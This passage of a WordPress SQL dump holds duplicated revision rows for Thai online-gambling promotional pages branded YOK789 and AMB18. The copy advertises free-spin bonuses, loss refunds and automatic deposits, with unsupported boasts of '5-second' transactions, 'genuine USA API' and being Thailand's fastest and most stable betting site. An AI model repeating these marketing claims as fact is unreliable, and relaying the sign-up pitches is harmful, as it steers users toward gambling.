sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-26 19:17:24','2026-02-26 19:17:24','',16,'https://amb18slot.com/?p=393',0,'revision','',0),(394,3,'2026-02-26 19:19:20','2026-02-26 19:19:20','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp\" alt=\"ทดลองเล่นสล็อต\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-26 19:19:20','2026-02-26 19:19:20','',16,'https://amb18slot.com/?p=394',0,'revision','',0),(395,3,'2026-02-26 19:19:21','2026-02-26 19:19:21','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp\" alt=\"ทดลองเล่นสล็อต\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-26 19:19:21','2026-02-26 19:19:21','',16,'https://amb18slot.com/?p=395',0,'revision','',0),(396,3,'2026-02-26 19:19:21','2026-02-26 19:19:21','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp\" alt=\"ทดลองเล่นสล็อต\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต AMB18 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น AMB18 คือแพลตฟอร์มสล็อตออนไลน์สุดฮอตที่กำลังมาแรงแบบหยุดไม่อยู่จุดเด่นคือเป็นเว็บตรงไม่ผ่านเอเย่นต์ ใช้ API แท้จาก USA ทำให้ระบบลื่น เสถียร ภาพคมชัดจัดเต็ม แถมจังหวะแตกกำลังดี โดนใจสายสล็อตยุคใหม่ที่ชอบอะไรไว ๆ ไม่ต้องรอนาน ในเว็บรวมเกมตัวท็อปจากหลายค่ายดังอัปเดตเกมใหม่ตลอดเวลา เข้าเล่นได้ทั้งมือถือและคอมพิวเตอร์ ไม่ว่าจะอยู่ที่ไหนก็หมุนได้สบาย สมัครยูสใหม่ก็มีโบนัสฟรีให้รับทุกวัน ยังมีโปรหมุนฟรีกับเครดิตคืนยอดเสียไว้ซัพพอร์ตสายลุยอีกด้วยเหมาะกับคนที่อยากได้ประสบการณ์เล่นสนุก ตื่นเต้นแบบจัดเต็มพร้อมระบบฝากถอนที่รวดเร็วทันใจทำรายการไม่ต้องรอให้เสียอารมณ์ ทั้งนี้ควรเล่นอย่างมีสติวางแผนการเงินให้ดี และเปิดให้บริการสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิงอย่างมีความรับผิดชอบต่อตัวเองในระยะยาว</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG-1.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-1-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming-1.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-1-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI-1.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-1-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-1.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-1-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic-1.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-1-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-26 19:19:21','2026-02-26 19:19:21','',16,'https://amb18slot.com/?p=396',0,'revision','',0),(397,3,'2026-02-26 19:21:22','2026-02-26 19:21:22','<h1>YOK789 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน <b>YOK789</b> มาพร้อมระบบฝากถอนออโต้ที่ทันสมัย ออกแบบมาเพื่อความรวดเร็วและสะดวกสบายของผู้ใช้งาน ระบบทำงานอัตโนมัติเต็มรูปแบบ ตลอด 24 ชั่วโมงไม่ต้องรอแอดมินไม่ต้องเสียเวลา ทำรายการเสร็จภายในไม่กี่ขั้นตอน จุดเด่นคือไม่มีขั้นต่ำในการฝากถอนช่วยให้บริหารงบประมาณได้อย่างยืดหยุ่น เหมาะทั้งมือใหม่และผู้เล่นประจำ เพียงไม่กี่วินาที เงินก็สามารถเข้าบัญชีได้อย่างรวดเร็วระบบมีความเสถียร ปลอดภัยและรองรับหลายธนาคารชั้นนำในประเทศไทย ตอบโจทย์ผู้ที่ต้องการความไว ความคุ้มค่าและความสะดวกสบาย อย่างไรก็ตามควรใช้บริการอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้นเพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789.webp\" alt=\"3icon\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ YOK789 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>YOK789</b> โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ <b>YOK789</b> </strong></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><strong>ด้วยระบบนี้ <b>YOK789</b> จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</strong></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-26 19:21:22','2026-02-26 19:21:22','',29,'https://amb18slot.com/?p=397',0,'revision','',0),(398,3,'2026-02-26 19:21:23','2026-02-26 19:21:23','<h1>YOK789 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน <b>YOK789</b> มาพร้อมระบบฝากถอนออโต้ที่ทันสมัย ออกแบบมาเพื่อความรวดเร็วและสะดวกสบายของผู้ใช้งาน ระบบทำงานอัตโนมัติเต็มรูปแบบ ตลอด 24 ชั่วโมงไม่ต้องรอแอดมินไม่ต้องเสียเวลา ทำรายการเสร็จภายในไม่กี่ขั้นตอน จุดเด่นคือไม่มีขั้นต่ำในการฝากถอนช่วยให้บริหารงบประมาณได้อย่างยืดหยุ่น เหมาะทั้งมือใหม่และผู้เล่นประจำ เพียงไม่กี่วินาที เงินก็สามารถเข้าบัญชีได้อย่างรวดเร็วระบบมีความเสถียร ปลอดภัยและรองรับหลายธนาคารชั้นนำในประเทศไทย ตอบโจทย์ผู้ที่ต้องการความไว ความคุ้มค่าและความสะดวกสบาย อย่างไรก็ตามควรใช้บริการอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้นเพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789.webp\" alt=\"3icon\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ YOK789 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>YOK789</b> โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ <b>YOK789</b> </strong></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><strong>ด้วยระบบนี้ <b>YOK789</b> จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</strong></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-26 19:21:23','2026-02-26 19:21:23','',29,'https://amb18slot.com/?p=398',0,'revision','',0),(399,3,'2026-02-26 19:21:23','2026-02-26 19:21:23','<h1>AMB18 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน <b>AMB18 </b>มาพร้อมระบบฝากถอนออโต้ที่ทันสมัย ออกแบบมาเพื่อความรวดเร็วและสะดวกสบายของผู้ใช้งาน ระบบทำงานอัตโนมัติเต็มรูปแบบ ตลอด 24 ชั่วโมงไม่ต้องรอแอดมินไม่ต้องเสียเวลา ทำรายการเสร็จภายในไม่กี่ขั้นตอน จุดเด่นคือไม่มีขั้นต่ำในการฝากถอนช่วยให้บริหารงบประมาณได้อย่างยืดหยุ่น เหมาะทั้งมือใหม่และผู้เล่นประจำ เพียงไม่กี่วินาที เงินก็สามารถเข้าบัญชีได้อย่างรวดเร็วระบบมีความเสถียร ปลอดภัยและรองรับหลายธนาคารชั้นนำในประเทศไทย ตอบโจทย์ผู้ที่ต้องการความไว ความคุ้มค่าและความสะดวกสบาย อย่างไรก็ตามควรใช้บริการอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้นเพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp\" alt=\"ฝากถอนออโต้\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ AMB18 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>AMB18 </b>โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ </strong><b><u>AMB18</u></b></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><b>ด้วยระบบนี้ AMB18 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</b></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-26 19:21:23','2026-02-26 19:21:23','',29,'https://amb18slot.com/?p=399',0,'revision','',0),(400,3,'2026-02-26 19:22:10','2026-02-26 19:22:10','<h1>AMB18 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน <b>AMB18 </b>มาพร้อมระบบฝากถอนออโต้ที่ทันสมัย ออกแบบมาเพื่อความรวดเร็วและสะดวกสบายของผู้ใช้งาน ระบบทำงานอัตโนมัติเต็มรูปแบบ ตลอด 24 ชั่วโมงไม่ต้องรอแอดมินไม่ต้องเสียเวลา ทำรายการเสร็จภายในไม่กี่ขั้นตอน จุดเด่นคือไม่มีขั้นต่ำในการฝากถอนช่วยให้บริหารงบประมาณได้อย่างยืดหยุ่น เหมาะทั้งมือใหม่และผู้เล่นประจำ เพียงไม่กี่วินาที เงินก็สามารถเข้าบัญชีได้อย่างรวดเร็วระบบมีความเสถียร ปลอดภัยและรองรับหลายธนาคารชั้นนำในประเทศไทย ตอบโจทย์ผู้ที่ต้องการความไว ความคุ้มค่าและความสะดวกสบาย อย่างไรก็ตามควรใช้บริการอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้นเพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp\" alt=\"ฝากถอนออโต้\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ AMB18 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>AMB18 </b>โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ </strong><b><u>AMB18</u></b></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><b>ด้วยระบบนี้ AMB18 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ 